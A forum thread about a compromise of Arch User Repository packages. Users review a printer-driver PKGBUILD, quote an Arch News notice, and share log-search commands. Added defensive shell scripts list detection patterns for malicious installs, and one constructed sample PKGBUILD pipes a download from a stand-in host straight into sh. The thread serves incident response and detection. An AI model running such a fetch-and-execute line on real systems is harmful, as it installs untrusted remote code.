AUR Compromised - Almost 2000 packages affected - 20260611

How would a locked pinned thread with all the info required reduce visibility? Unnecessary chatter and noise isn’t a proper form of communication during a security incident.

example: Attack wave on AUR packages - Announcements - Garuda Linux Forum

Any way to see the pkgbuild?

It’s likely that there was a modification to the build script designed to pull in malware during the install… the issue will be in the PKGBUILD.

󰛓 ❯ paru epson-inkjet-printer-escpr2-clos-bin
1 aur/epson-inkjet-printer-escpr2-clos-bin 1.1.12-1 [+0 ~0.00]
Epson ESC/P-R2 printer driver (L8050/L8058/L6160 etc.), from UOS signed DEB
:: Zu installierende Pakete (z. B: 1 2 3, 1-3):
:: 1
:: Löse Abhängigkeiten auf…
:: Konflikte berechnen…
:: Interne Konflikte berechnen…

Repo (5)                                  Alte Version  Neue Version   Nur Make
extra/cups                                              2:2.4.19-1     Nein
extra/cups-filters                                      2.0.1-2        Nein
extra/libcupsfilters                                    2.1.1-4        Nein
extra/libppd                                            2.1.1-2        Nein
extra/qpdf                                              12.3.2-2       Nein

Aur (1)                                   Alte Version  Neue Version   Nur Make
aur/epson-inkjet-printer-escpr2-clos-bin                1.1.12-1       Nein

:: Mit Überprüfung fortfahren? [J/n]:

:: Lade PKGBUILDs herunter…
(1/1) epson-inkjet-printer-escpr2-clos-bin-1.1.12-1 [-----------------------------------------------------------------]
:: epson-inkjet-printer-escpr2-clos-bin:
.gitignore:

PKGBUILD:

epson-inkjet-printer-escpr2-clos-bin.install:

:: Änderungen akzeptieren? [J/n]: n

Hi all,

I’m fairly new to Linux — long Windows/Windows Server background, but CachyOS is my first real dive into the Linux world. It started as a test a few months ago, and I got hooked so hard I can’t imagine going back now.

It was pure coincidence that I heard about this attack. Even though I’m not infected, it raised a question: what if I had been infected and never heard about it?

First:
How would Cachy — or the nice and awesome people around it who keep it running — help me in that case? Coming from Windows, with good security tools and regular updates, sooner or later I would have known I was infected, because some sec tool would have flagged the communication to C&C servers, or manipulated DLLs/processes, etc. On Cachy there’s no equivalent phoning home, which I actually extremely appreciate from a privacy standpoint. So is the answer simply “awareness via mailing list / forum / RSS, and if you miss it, bad luck”? Or is there more to it that I’m not seeing?

To be honest, I didn’t even know these mailing lists existed until I landed on this thread — and I’ll admit I have zero appetite for signing up to something that fills my inbox. That’s kind of my point: critical security news like “your system might be compromised” should ideally surface somewhere in the OS itself — with an option to dismiss/hide it for those who don’t want it. New users coming from Windows are never going to subscribe to a mailing list or look into forums. They just won’t. So if that’s the only channel, a whole wave of migrants will simply miss things like this. Is there anything in that direction already, or is it purely on the user to go find the info?

Second:
coming from a world of mandatory EDR/XDR, I’m trying to understand the host-based detection story on Linux. I get that the security model is structurally different — signed repos, package management, smaller attack surface, review-before-build for the AUR. But for the residual risk (a compromised upstream, a bad official supplier, something that slips past review), do people here use anything like AIDE, auditd, or ClamAV? Or is the consensus that those add more noise than value, and discipline + repo trust is the real control?

I’m feeling kinda insecure now :confused: I miss my sec tools…

Asking partly with the next wave of MS->Linux migrants in mind — a lot of them won’t be very security-aware, and I’d like to understand what the realistic baseline advice for them should be.

Thanks — and thanks to everyone keeping this distro running.

It’s linked in the commits, right? And I can’t see any of that npm stuff in there, or am I reading this wrong?

@Sunda-Spirit I would not install it if it is on the list. To see the PKGBUILD, I thought I only need to go here, right? And I can see no malicious looking code in there. Maybe I’m looking wrong and I’d really love to understand my mistake.

Hmmm maybe cleaned up already? It doesn’t look ‘wrong’ to me.

You can get the current pkgbuild by doing git clone without installing…

PKGBUILD
# Maintainer: HarryLoong <local>

pkgname=epson-inkjet-printer-escpr2-clos-bin
pkgver=1.1.12
pkgrel=1
pkgdesc='Epson ESC/P-R2 printer driver (L8050/L8058/L6160 etc.), from UOS signed DEB'
arch=('x86_64' 'aarch64')
url='https://www.epson.com.cn/services/supportproduct.html?p=53ce92f1e56342f8b89981ee9b461572&tab=1'
license=('GPL-2.0-or-later' 'LGPL-2.1-or-later' 'custom:Epson')
depends=('cups' 'glibc' 'libcups')
optdepends=('colord: color profile support')
provides=('epson-inkjet-printer-escpr2')
install=${pkgname}.install
conflicts=('epson-inkjet-printer-escpr2')
options=('!debug' '!strip')

_pkgver=${pkgver//./_}
_uosver=21
_baseurl='https://eposs.epson.com.cn/EPSON/assets/resource/Download/Service/driver/Inkjet/L8058'
_debname="signed_epson-inkjet-printer-escpr2_${_pkgver}_UOS_${_uosver}"

source_x86_64=("${_debname}_amd64.deb::${_baseurl}/${_debname}_amd64.deb")
source_aarch64=("${_debname}_arm64.deb::${_baseurl}/${_debname}_arm64.deb")

sha256sums_x86_64=('b28f668b8a6248ce2dc950af6904ec5b4ec138d99b87a61bb3de5241d5021a3c')
sha256sums_aarch64=('b5262ea984320a1404561c479895c43ac4bc0f07ffda9e0216e7404a800bcfca')

noextract=("${_debname}_amd64.deb" "${_debname}_arm64.deb")

# Resolve architecture-specific source filename
if [ "$CARCH" = "x86_64" ]; then
  _srcdeb="${_debname}_amd64.deb"
elif [ "$CARCH" = "aarch64" ]; then
  _srcdeb="${_debname}_arm64.deb"
fi

prepare() {
  ar x "${_srcdeb}" data.tar.xz
}

package() {
  tar --no-same-owner -xJf data.tar.xz -C "${pkgdir}"

  rm -f "${pkgdir}/usr/lib/libescpr2.a"
  rm -f "${pkgdir}/usr/lib/libescpr2.la"

  install -dm755 "${pkgdir}/usr/share/ppd"
  ln -s ../cups/model/Epson/epson-inkjet-printer-escpr2 \
    "${pkgdir}/usr/share/ppd/epson-inkjet-printer-escpr2"

  install -dm755 "${pkgdir}/usr/share/licenses/${pkgname}"
  ln -s ../../doc/epson-inkjet-printer-escpr2/COPYING \
    "${pkgdir}/usr/share/licenses/${pkgname}/COPYING"
  ln -s ../../doc/epson-inkjet-printer-escpr2/COPYING.LIB.gz \
    "${pkgdir}/usr/share/licenses/${pkgname}/COPYING.LIB.gz"
  ln -s ../../doc/epson-inkjet-printer-escpr2/COPYING.EPSON.gz \
    "${pkgdir}/usr/share/licenses/${pkgname}/COPYING.EPSON.gz"
}

It pulls a signed .deb directly from Epson’s official server.
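As an added example (not from this thread and not from any AUR package), a small POSIX shell helper for the clone-and-read step described above: it lists every URL a PKGBUILD fetches from, so you can check they match the upstream the pkgdesc claims (as the Epson driver above does), and it highlights lines that deserve a careful read, including the npm/bun invocations this incident is known for. The indicator patterns are assumptions drawn from common PKGBUILD review advice, and the two sample PKGBUILDs are constructed for this example; a hit is a prompt to read that line, not a verdict, and no hit is not a clean bill.

```shell
#!/bin/sh
# Added example (not from the thread or any AUR package): a first-pass
# checklist for a PKGBUILD obtained with `git clone`, before building it.
# The indicators below are assumptions based on common review advice.

# scan_pkgbuild FILE
#   Prints "line:text" for lines matching a review indicator.
#   Exit status is grep's: 0 = something to read closely, 1 = no match.
scan_pkgbuild() {
    # Word boundaries spelled out (no \b) so BSD and GNU grep agree.
    w='(^|[^[:alnum:]_])'
    e='([^[:alnum:]_]|$)'
    grep -nE \
        -e "${w}(npm|npx|pnpm|yarn|bun|bunx)${e}" \
        -e "${w}(curl|wget)${e}.*\|[[:space:]]*(ba)?sh${e}" \
        -e "${w}base64${e}.*(-d|--decode)" \
        -e "${w}eval${e}" \
        -e "(md5|sha[0-9]+|b2)sums[^=]*=\(.*'SKIP'" \
        "$1"
}

# list_sources FILE
#   Every URL in the file, de-duplicated: compare each against the upstream
#   the pkgdesc and url= fields claim.
list_sources() {
    grep -oE "https?://[^ \"')]+" "$1" | sort -u
}

# review_verdict FILE -> "REVIEW" if any indicator fired, else "NO-HITS".
review_verdict() {
    if scan_pkgbuild "$1" >/dev/null; then
        echo "REVIEW"     # read the flagged lines in context
    else
        echo "NO-HITS"    # still read the whole file; this is only a filter
    fi
}

# Constructed samples (not real packages) so the script runs offline.
SAMPLE_DIR=$(mktemp -d)
cat >"$SAMPLE_DIR/PKGBUILD.clean" <<'EOF'
pkgname=example
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
}
EOF
cat >"$SAMPLE_DIR/PKGBUILD.suspicious" <<'EOF'
pkgname=example-bin
pkgver=1.0
pkgrel=2
source=("https://example.invalid/example-1.0.tar.gz")
sha256sums=('SKIP')
prepare() {
  curl -fsSL https://example.invalid/setup.sh | sh
}
package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
  bun install js-digest
}
EOF

for f in "$SAMPLE_DIR"/PKGBUILD.clean "$SAMPLE_DIR"/PKGBUILD.suspicious; do
    echo "== $f: $(review_verdict "$f")"
    list_sources "$f"
    scan_pkgbuild "$f"
done
```

Against a real checkout, run `scan_pkgbuild PKGBUILD` and `scan_pkgbuild *.install` in the cloned directory, and pair it with `git log -p -- PKGBUILD` so a recent change to a previously quiet package stands out.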

The best way to stay informed about something like this would be Arch News. There are two methods to stay apprised of this within the default CachyOS.

cachy-update, which many know as the system tray icon updater. It checks the Arch News every time you update for new entries and will allow you to view entries prior to updating.

==> Looking for recent Arch News...

==> Arch News:
1 - Active AUR malicious packages incident
2 - Arch Linux 2026 Leader Election Results
3 - Breaking changes for all users of `varnish`, which is renamed to `vinyl-cache`
4 - kea >= 1:3.0.3-6 update requires manual intervention
5 - iptables now defaults to the nft backend

-> Select the news to read (e.g. 1 3 5), select 0 to read them all or press "enter" to quit: 1

---
Title: Active AUR malicious packages incident
Author: Campbell Jones
Publication date: 2026-06-12
URL: https://www.archlinux.org/news/active-aur-malicious-packages-incident/
---

We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.
We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed.
While this is happening, and while we work to create a more permanent solution, users may see issues with the following:

Creating new accounts on the AUR
Pushing package updates
Adopting or creating new packages

We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time.
If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.

The other would be within Shelly, which has become CachyOS’s default graphical package manager. Now, I don’t actually use this program but I can see in a testing VM that it does have a way to view the news.

I believe they’ve worked hard to revert the malicious changes on most if not all of the affected packages.

That said, as it always bears reiterating, checking the PKGBUILD this way is the best way to go.

No NPM stuff but a bin that was mysteriously updated yesterday. Wouldn’t trust and would reload machine if you pulled that update.

Because then it wouldn’t be in recent posts?

I wouldn’t install it anyway, because I don’t need it :slightly_smiling_face:

I can’t make heads or tails of that PKGBUILD. I’ve never seen anything like it. It’s extremely suspicious.

The announcement threads are usually locked posts or rare enough that everyone visiting the front page of the forums would see it. You can even pin posts to the top of discuss and it’ll be shown wherever the user initially lands. Sifting through a 300-post thread is not a proper way for someone to get information. Just more confusing.

PKGBUILD - ArchWiki: behold, the fount of knowledge is bestowed

I’m referring to the PKGBUILD, the output of which I linked above. Can anyone interpret it?

That was me a couple of years ago… it’s time to start learning, or maybe just ask for advice for each specific case.

Most of them aren’t too bad, and you can easily check links if you’re not confident… I started doing this after the last round - the previous attacks were quite laughable, so obvious and childish in nature. Perhaps that was just a playful test run as they designed and planned for this attack - who knows?

We shouldn’t assume they’re stupid though… and there’s no danger in pasting a PKGBUILD in the forum to get advice.

Hopefully everyone has snapshots and backups - if you don’t have a snapshot old enough to predate the last update (you can check pacman.log) then a clean install is the likely answer - at least with a backup it’s not too bad to get set up again.

grep -E "npm install atomic-lockfile|bun install js-digest" /var/log/pacman.log
grep -E "Running .*(npm|npx|pnpm|yarn|bun|bunx).*" /var/log/pacman.log

Don’t get too scared by all the red text…
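As an added example (not from this thread), the two grep commands above wrapped into a small offline pacman.log triage script, extended with the snapshot question raised in the same post: it reports the timestamp of the most recent package change and the set of packages installed or upgraded since a given date, so you can tell whether a snapshot actually predates the last update. It assumes the stock pacman log line format `[ISO-timestamp] [TAG] message`; the sample log, including its scriptlet line, is constructed for this example.

```shell
#!/bin/sh
# Added example (not from the thread): offline triage of /var/log/pacman.log.
# Assumes the stock format "[ISO-timestamp] [TAG] message". The sample log
# below is constructed; package names and versions in it are not real events.

# pkgs_since LOG SINCE
#   Packages installed or upgraded at or after SINCE (e.g. 2026-06-11),
#   sorted and de-duplicated: the set that a restore must roll back.
pkgs_since() {
    awk -v since="$2" '
        $1 ~ /^\[/ && $2 == "[ALPM]" && ($3 == "installed" || $3 == "upgraded") {
            ts = substr($1, 2, length($1) - 2)    # strip the brackets
            if (ts >= since) print $4             # ISO timestamps compare as strings
        }' "$1" | sort -u
}

# last_change LOG
#   Timestamp of the most recent install/upgrade; a snapshot is only useful
#   for this incident if it was taken before this moment.
last_change() {
    awk '$2 == "[ALPM]" && ($3 == "installed" || $3 == "upgraded") {
             ts = substr($1, 2, length($1) - 2)
         }
         END { print ts }' "$1"
}

# flag_lines LOG
#   The two indicator patterns from the thread: the known npm/bun package
#   installs, and any logged command that runs a JavaScript package manager.
flag_lines() {
    grep -E -e 'npm install atomic-lockfile|bun install js-digest' \
            -e 'Running .*(npm|npx|pnpm|yarn|bun|bunx).*' "$1"
}

# Constructed sample log (not a real system's history).
LOG=$(mktemp)
cat >"$LOG" <<'EOF'
[2026-06-10T14:02:11+0200] [PACMAN] Running 'pacman -Syu'
[2026-06-10T14:02:13+0200] [ALPM] upgraded cups (2:2.4.18-1 -> 2:2.4.19-1)
[2026-06-10T14:02:14+0200] [ALPM] upgraded qpdf (12.3.2-1 -> 12.3.2-2)
[2026-06-11T09:15:02+0200] [PACMAN] Running 'pacman -U /home/user/.cache/paru/clone/example-bin/example-bin-1.0-2-x86_64.pkg.tar.zst'
[2026-06-11T09:15:04+0200] [ALPM] installed example-bin (1.0-2)
[2026-06-11T09:15:05+0200] [ALPM-SCRIPTLET] Running 'bun install js-digest' from post_install
[2026-06-11T09:15:05+0200] [ALPM-SCRIPTLET] Updating icon theme caches...
[2026-06-11T09:15:06+0200] [ALPM] installed example-extra (2.0-1)
EOF

echo "last package change: $(last_change "$LOG")"
echo "changed since 2026-06-11:"
pkgs_since "$LOG" 2026-06-11
echo "indicator hits:"
flag_lines "$LOG" || echo "(none)"
```

On a live system, point the functions at `/var/log/pacman.log` and pass the creation time of the snapshot you intend to restore as SINCE: an empty list means the snapshot predates every package change, anything printed is what the restore will not undo. No indicator hit only means those two patterns did not appear in the log; it does not clear a package that the list says was compromised at some point.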

I don’t understand this PKGBUILD [which I linked above] at all. Sorry, my mistake.

See? That’s what I mean. It doesn’t look too suspicious to me except of course for the fact that that AUR account is brand new. I really wonder how that one package made its way on the list of infected packages. I should probably ask that over at the Arch mailing list or something, but I can’t be arsed :shushing_face:

No - We have never had to do this before.

But this time some users who have been flagged repeatedly here have been silenced for a few days.

Any package on the list will have been flagged as compromised.
It likely has also had the malicious commits reverted by now.
But at some point it contained something not so nice.

Didn’t pull that. epsonscan2 is currently my only AUR package and it’s not on the list (and its PKGBUILD commits of late look OK to me), but I browsed the list a little and that epson package just piqued my interest.